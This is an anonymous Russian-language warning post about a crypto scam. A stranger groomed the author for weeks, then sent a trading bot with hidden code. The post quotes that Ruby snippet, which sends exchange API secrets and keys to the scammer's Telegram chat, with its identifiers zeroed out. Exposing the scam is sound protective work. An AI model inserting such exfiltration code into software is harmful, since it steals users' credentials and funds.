Осторожно, мошенники!
АнонимМеня пытались обокрасть. Будьте предельно внимательны, в чатах сидят мошенники и выискивают себе жертвы.
Началось все с того, что мне в личку написал неизветный. Я девушка и аватарка была с моей фотографией (ошибка номер один) и мое имя (ошибка номер два).
Писал импозантный мужчина, рассказал как он живет пол-года в Париже, пол года в Москве и тд и тп. Обработка шла несколько недель. Втерался в доверие. Он не писал каждый день, это была очень тонкая психологическая игра. Никаких заигрываний, только помощь в трейдинге, книжечки, статейки и тд, честно скажу - подкупало.
Дальше сказал скинет торговый бот для биттрикса. Тут я пошла узнавать у друзей как это работает и что это такое и можно ли украсть мои данные с помощью этого бота. Мне сказали - можно. Но я все равно согласилась принять "помощь от симпатичного незнакомца" так как код к боту можно и нужно (!!!) читать.
И вот, час икс настал я получила файл с ботом, трейдер мне помогал его настраивать. И тут я открываю код. Ха-ха и что я вижу? В нормальный трейдинговый бот вставлен вот такой код (в целях безопасности я удалила настоящий номер чата, а то мало ли, найдут меня хакнут и тд) который скинул бы мои секретные ключи из биттрикса прямо в лапы мошенникам (разработчики работающие с Руби поймут):
from_bot = Telegram::Bot::Api.new("00000000000000000000000000000000000)
from_bot.send_message(
chat_id: "000000",
text: "SECRET: #{API_SECRET}, KEY: #{API_KEY}",
parse_mode: :markdown
)
Я пошла на платную консультацию к разработчику ботов (ибо в бесплатное я уже не верю). Он подтвердил что:
а) бот действительно рабочий (ура!)
б) вставка для телеграма создана для того, чтобы отправлять мои данные напрямую в чат, без всякой кодировки - прямо как оно есть.
Вот что мне написал айтишник:
Вывод - никому не доверяйте в крипте. Чтобы вам не обещали, никому никогда не доверяйте, особенно если не знаете как обезопасить себя. И еще, учите английский, все коды пишутся на нем.